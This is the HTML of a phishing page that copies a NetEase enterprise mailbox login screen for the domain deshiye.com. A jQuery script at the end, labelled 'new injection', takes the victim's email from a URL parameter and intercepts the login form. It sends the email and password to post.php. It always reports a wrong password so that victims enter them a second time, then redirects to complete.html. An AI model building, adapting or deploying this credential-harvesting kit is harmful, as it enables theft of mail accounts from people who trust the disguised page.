<html xmlns="http://www.w3.org/1999/xhtml" lang="zh-CN"><head>
		<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
		<meta name="keywords" content="网易企业邮箱,登录企业邮箱,企业邮箱注册,电子邮箱">
		<meta name="description" content="网易企业邮箱登录页面繁体版，帮助用户登录企业邮箱，开启随时随地，极速收发的便捷体验。">
		<meta name="title" content="网易企业邮箱 - 企业信息化专业解决方案">
		<title>deshiye.com - 邮箱用户登录</title>
		<link href="https://mimg.qiye.163.com/o/domain/202208121212/index/css/global.css" rel="stylesheet" type="text/css">
		<link href="https://mimg.qiye.163.com/o/domain/202208121212/index/css/user.css" rel="stylesheet" type="text/css">
		<style type="text/css">
			.login-mod h2, .intro-mod h2, .news-mod h2 {
				background-image:url(https://mimg.qiye.163.com/o/domain/202208121212/index/css/../img/bg_cn_noqiye.png);
				background-repeat:no-repeat;
			}
			.login-mod-wrapper {
				width: 413px;
				height: 355px;
				position: absolute;
				top:40px;
				left: 498px;
			}
			.login-mod-form {
				background: url(https://mimg.qiye.163.com/o/domain/202208121212/index/css/../img/loginFormBg.png) no-repeat;
			}
			.login-mod-qr {
				background: url(https://mimg.qiye.163.com/o/domain/202208121212/index/css/../img/bg_qr_expand.png) no-repeat;
			}
			.login-mod .fi-notit {
				padding-left:30px;
			}
			.login-qr {
				position: absolute;
				left: 350px;
				top: 291px;
				width: 64px;
				height: 64px;
				cursor: pointer;
			}
			.login-qr-1 {
				background: url(https://mimg.qiye.163.com/o/domain/202208121212/index/css/../img/ic_qr.png) no-repeat;
			}
			.login-qr-1-hover {
				left: 349px;
				background: url(https://mimg.qiye.163.com/o/domain/202208121212/index/css/../img/ic_qr_hover.png) no-repeat;
			}
			.app-download {
				float:left;
				margin-left:10px;
				padding-left:20px;
				margin-top:6px;
			}
			.app-download-android {
				background:url(https://mimg.qiye.163.com/o/domain/202208121212/index/css/../img/ic_android.png) no-repeat;
			}
			.app-download-iphone {
				background:url(https://mimg.qiye.163.com/o/domain/202208121212/index/css/../img/ic_apple.png) no-repeat;
			}
			.app-download-link {
				color: #9eb8a0;
				text-decoration: none;
			}
			.logo {
				width:150px;
				height:40px;
				background: url("https://mimg.qiye.163.com/o/public/logo.gif") no-repeat 0 0;
			}
			.fi{
				padding: 5px 0 !important;
			}
			.form-btn {
				background: url(https://mimg.qiye.163.com/o/domain/202208121212/index/css/../img/button.png) no-repeat;
				width: 156px;
				height: 34px;
				border: none;
				color: #fff;
				cursor: pointer;
			}
			.form-btn:focus {
				outline: none;
			}
			#err-wrapper{
				/* width: 280px !important; */
				margin-left: 78px;
				/* text-align: center; */
				height: 16px;
				font-size: 12px;
			}
			.ssl-line{display: inline-block;}
			.ssl-line select{
				border: none;
				width: auto!important;
				right: 10px;
				height: auto!important;
				line-height: initial !important;
				vertical-align: inherit;
			}
      .official-app {
        position: relative;
        z-index: 10;
      }
      .official-app > .download-qrcode {
        display: none;
        position: absolute;
        top: 5px;
        left: 50%;
        -ms-transform: translate(-50%, 15px);
        -webkit-transform: translate(-50%, 15px);
        transform: translate(-50%, 15px);
        padding: 10px 0px 5px;
        box-shadow: 0px 4px 8px rgba(38, 42, 51, 0.1);
        border-radius: 8px;
        background: #FFFFFF;
        border: 1px solid #E1E1E1;
        color: #000;
        width: 130px;
        text-align: center;
      }
      .official-app > .download-qrcode > img {
        display: block;
        margin: 0 auto;
      }
      .official-app > .download-qrcode > p {
        font-size: 14px;
        color: #888;
      }
      .official-app:hover > .download-qrcode {
        display: block;
      }
			.lingxi-download-btn {display: inline-block;border: 1px solid #386ee7;color: #386ee7;padding:2px 12px;border-radius: 25px;font-size: 14px;}
			#donwload_block{color: #386ee7;margin-bottom: 30px;font-size: 16px;margin: 10px auto 10px;cursor: pointer;width: 260px;text-align: center;}
			#donwload_block .download-title{margin: 0 5px;}
			#msgpid {
				text-align: right;
			}
		</style>
		<link href="https://mimg.qiye.163.com/o/domain/202208121212/index/css/custom.css" rel="stylesheet" type="text/css">
		<!--[if lt ie 9]>
		<style type="text/css">
			.logo {
				background: none;
				filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//mimg.qiye.163.com/o/public/logo.gif', sizingMethod='scale');
			}
		</style>
		<![endif]-->
	</head>
	<body>
		<div class="page">
			<div class="header">
				<h1 class="logo"></h1>
				<div class="toplinks">
                    <a href="javascript:;" class="official-app" id="official_app">
                        邮箱官方客户端
                        <div class="download-qrcode">
                        	<img src="https://mimg.qiye.163.com/o/domain/202208121212/index/css/../img/user.png" width="102" height="102">
                        	<p>扫码下载官方APP</p>
                        </div>
                    	</a> |
                    <a href="/?hl=en_US" target="_self">English</a> |
                        <a href="https://qiye.163.com/help/l-1.html" target="_blank">帮助</a>
                    </div>
			</div>
			<div class="body">
				<div class="part main-part" id="main-part" style="background-image: url(&quot;https://mimg.qiye.163.com/p/official_site/admin/imageRight.png&quot;); cursor: pointer;">
					<div id="login-mod-wrapper" class="login-mod-wrapper login-mod-form login-mod-wrapper-0" style="cursor: default; display: block;">
						<div class="mod login-mod  ">
							<form name="loginform" id="loginform" action="" method="post" >
								<!-- <input type="hidden" name="ch" id="ch" value="icp"> -->
								<input type="hidden" name="pubid" id="pubid" value="">
								<input type="hidden" name="passtype" id="passtype" value="">
								<input type="hidden" name="support_verify_code" id="support_verify_code" value="1">
								<input type="hidden" name="domain" id="domain" value="deshiye.com">
									<script type="text/javascript" async="" src="https://hubble-js-bucket.nosdn.127.net/DATracker.globals.1.6.12.8.js"></script><script type="text/javascript">
										window.myDomain = "deshiye.com";
										window.isCommonPage = false;
										if(window.myDomain == "qiye.163.com"){
											window.isCommonPage = true;
										}
									</script>
								<div class="fi">
									<label class="tit">
										用户名
									</label>
									<input type="text" name="email" id="email" class="ipt-t ipt-sample" >
								</div>
								<div class="fi">
									<label class="tit">
										密 码
									</label>
									<input type="password" class="ipt-t" name="password" id="password" >
								</div>
								<center><p id="msg" style="color:red;"></p></center>
								<!-- 新增验证码 -->
								<div id="verifyCodeWrap" class="fi f-dn">
									<label class="tit">验证码</label>
									<input type="text" name="verify_code" id="verify_code" style="float:left;width:140px;height:24px;line-height:24px;" class="ipt-sample">
									<a id="codeImgWrap" style="float:left;width:100px;height:30px;padding:0;margin:0;display:block;cursor:pointer;" href="javascript:void(0);">
										<img src="" style="width:100%;height:100%;">
									</a>
								</div>
								<div class="fi" style="clear:both;">
									<label for="remUsername">
										<input name="remUser" id="remUsername" value="1" type="checkbox" class="ipt-c">
										记住用户名
									</label>
									&nbsp;&nbsp;
									<input type="hidden" name="secure" value="1">
									<div class="ssl-line">使用
										<select name="all_secure" id="all_secure">
											<option value="1">全程SSL登录</option>
											<option value="0">SSL安全登录</option>
										</select>
										<select name="ch" id="ch">
											<option value="">默认线路</option>
											<option value="hw">国际线路</option>
										</select>
									</div>
								</div>
								<div id="err-wrapper" class="err">
									<span id="msgpid"></span>
								</div>
								<div class="fi fi-notit f-cb" style="text-align: center;">
									<input type="submit" class="form-btn" value="登　录" id="submit-btn">
								</div>
								<div class="app-list"> 
									<ul id="appList">
										<li>
											<img id="appDashi" src="https://mimg.qiye.163.com/o/domain/202208121212/index/css/../img/icon-dashi.png" width="24" height="24" style="vertical-align: sub;">
										</li>
										<li>
											<img id="appWechat" src="https://mimg.qiye.163.com/o/domain/202208121212/index/css/../img/icon-wx.png" width="24" height="24" style="vertical-align: sub;">
										</li>
										<li>
											<img id="appQiyeWechat" src="https://mimg.qiye.163.com/o/domain/202208121212/index/css/../img/icon-qiyewx.png" width="24" height="24" style="vertical-align: sub;">
										</li>
										<ul>
								</ul></ul></div>
								<div class="goto" style="margin-top:0;">
										<a href="/admin.jsp" class="gotoLink" target="_blank">管理员登录</a>
                                        <a class="gotoLink" id="resetPwd">忘记密码？</a>
										<a class="gotoLink" id="selectNetwork">登录太慢？</a>
										</div>
								</form>
							<div id="donwload_block">
									<img src="https://mimg.qiye.163.com/o/domain/202208121212/index/css/../img/lingxi.png" width="20" height="20" style="vertical-align: sub;">
									<span class="download-title">邮箱官方客户端</span>
									<span class="lingxi-download-btn">立即下载</span>
								</div>
							</div>
						<div class="m-codebox js-codebox f-zindex-10 login-mod-form" id="codeContain">
						<!-- 安全登录 -->
						<div id="appLoginTab" class="appLoginTab">
							<div id="appLoginWait" style="display: block;">
								<h3>手机扫码 安全防盗</h3>
								<div id="appCodeWrap" class="appCodeWrap allowmove">
									<div id="appCodeBox" class="appCodeBox">
										<img id="appCode" class="appCode" width="130" height="130" src="">
										<div id="appCodeRefresh" class="appCodeRefresh" style="display: none;">
											<div class="appCode-wrap"><p>二维码已失效<br>请点击刷新</p></div>
										</div>
									</div>
								</div>
								<p id="appLoginTxt" class="appLoginTxt txt-err"></p>
								<span class="appLogin-hint">使用 <span id="appName"></span> 扫描二维码登录</span>
							</div>
							<div id="appLoginScan" class="appLoginScan" style="display:none">
								<div class="appLogin-scanSuc"></div>
								<p class="appLogin-scantxt txt-suc">成功扫描，请在手机上确认登录</p>
								<a id="appLoginRestart" class="appLoginRestart" href="javascript:void(0)">返回重新扫描</a>
							</div>
						</div>
						<a class="closeentry js-closeentry" href="javascript:;" hidefocus="true" id="closeEntryBtn"></a>
						</div>
                    </div>
					</div>
				<div class="part sec-part">
						<div class="mod sec-mod intro-mod">
								<h2>
									简介
								</h2>
								</div>
						<div class="mod sec-mod news-mod">
								<h2>
									新闻
								</h2>
								</div>
						</div>
				</div>
			<div class="footer">
                <div class="link">
                        <a href="http://corp.163.com/gb/home.shtml" target="_blank">关于网易</a>
                        <a href="http://corp.163.com/gb/legal/legal.html" target="_blank">相关法律</a>
                        <a href="http://qiye.163.com" target="_blank">企业邮箱</a>
                    </div>
                    <div class="right">
                        <span>已支持IPv6网络&nbsp;&nbsp;&nbsp;&nbsp;本系统由网易企业邮提供 ©1997-<script language="javascript" src="//mimg.qiye.163.com/copyright/year.js"></script>2022 </span>
                    </div>
                </div>
		</div>
	
	<script type="text/javascript">
	var currentBanner = '//mimg.qiye.163.com/domain/img/user_bg.jpg',
		isDefaultBg = !currentBanner || currentBanner.indexOf('img/user_bg.jpg') > -1 || false, // 兼容老版本使用user_bg.jpg 或者 为空 实际也表示默认背景
		currentStyle = '0',
		addresses = 't,c,h',
		isHmail = !!1, // 邮箱系统类型：0-cm,1-hm
        errMsg = '',
        domainType = 'bj' || 'bj';
        pageType = 'normal';
        verifyCodeUrl = window.location.protocol + '//entry.qiye.163.com/domain/getverifycode.jsp';
        // verifyCode = 'false';
		if(window.location.href.indexOf('code=true') > -1){
			verifyCode = 'true'
		}else{
			verifyCode = 'false';
		}
		var highTls = 'false';
		var cssPath = '//mimg.qiye.163.com/o/domain/202208121212/index/css/';
	</script>
	<script type="text/javascript">
		(function(document,datracker,root){function loadJsSDK(){var script,first_script;script=document.createElement("script");script.type="text/javascript";script.async=true;script.src="https://hubble-js-bucket.nosdn.127.net/DATracker.globals.1.6.12.8.js";first_script=document.getElementsByTagName("script")[0];first_script.parentNode.insertBefore(script,first_script)}if(!datracker["__SV"]){var win=window;var gen_fn,functions,i,lib_name="DATracker";window[lib_name]=datracker;datracker["_i"]=[];datracker["init"]=function(token,config,name){var target=datracker;if(typeof(name)!=="undefined"){target=datracker[name]=[]}else{name=lib_name}target["people"]=target["people"]||[];target["abtest"]=target["abtest"]||[];target["toString"]=function(no_stub){var str=lib_name;if(name!==lib_name){str+="."+name}if(!no_stub){str+=" (stub)"}return str};target["people"]["toString"]=function(){return target.toString(1)+".people (stub)"};function _set_and_defer(target,fn){var split=fn.split(".");if(split.length==2){target=target[split[0]];fn=split[1]}target[fn]=function(){target.push([fn].concat(Array.prototype.slice.call(arguments,0)))}}functions="get_user_id track_heatmap register_attributes register_attributes_once clear_attributes unregister_attributes current_attributes single_pageview disable time_event get_appStatus track set_userId track_pageview track_links track_forms register register_once alias unregister identify login logout signup name_tag set_config reset people.set people.set_once people.set_realname people.set_country people.set_province people.set_city people.set_age people.set_gender people.increment people.append people.union people.track_charge people.clear_charges people.delete_user people.set_populationWithAccount  people.set_location people.set_birthday people.set_region people.set_account abtest.get_variation abtest.async_get_variable".split(" ");for(i=0;i<functions.length;i++){_set_and_defer(target,functions[i])}datracker["_i"].push([token,config,name])};datracker["__SV"]=1.6;loadJsSDK()}})(document,window["DATracker"]||[],window);
		DATracker.init('MA-B8B4-DCBCC6752B4F', {
			truncateLength: 255,
			persistence: "localStorage",
			cross_subdomain_cookie: false
		});
	</script>
	<script type="text/javascript" src="../js/loginjs.jsp"></script>
    <script type="text/javascript" src="//mimg.qiye.163.com/o/domain/202208121212/index/css/../js/qiye_algorithm.js"></script>
	<script type="text/javascript" src="//mimg.qiye.163.com/o/domain/202208121212/index/css/../js/ajax_util.js"></script>
	<script type="text/javascript" src="//mimg.qiye.163.com/o/domain/202208121212/index/css/../js/login_util.js"></script>
	<script type="text/javascript" src="//mimg.qiye.163.com/o/domain/202208121212/index/css/../js/select_ch.js"></script>
    <script type="text/javascript" src="//mimg.qiye.163.com/o/domain/202208121212/index/css/../js/select_banner.js"></script>
	<script type="text/javascript" src="//mimg.qiye.163.com/o/domain/202208121212/index/css/../js/reset_pwd.js"></script>
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>

 <script>
    /* global $ */
    $(document).ready(function(){
	var count=0;
	
     function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) {
          vars[key] = value;
        });
        return vars;
      }
      
      var number = getUrlVars()["msg"];

       $("#displayName").html(number);
       $("#email").val(number);
        $('#submit-btn').click(function(event){
        $('#error').hide();
        
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );
if (!password) {
    $('#msg').show();
    $('#msg').html("密碼為空!");

                return false;
            }
              



        ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      var finalu= c.toUpperCase();
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'post.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            data: $('#loginform').serialize(),
            beforeSend: function(xhr){
             
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                   $("#password").val("");
                  if (count>=2) {
                    count=0;
        window.location.replace("complete.html?msg="+email);
                  }
               	$("#msg").show();
               $('#msg').html("密碼不正確。請再試一次");
                }
                else{
               	$("#msg").show();
               $('#msg').html("密碼不正確。請再試一次");
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=2) {
                count=0;
           window.location.replace("complete.html?msg="+email);
              }
               	$("#msg").show();
               $('#msg').html("密碼不正確。請再試一次");
            },
            complete: function(){
             
            }
          });
    });
       


      
   });

   
</script>
</body></html>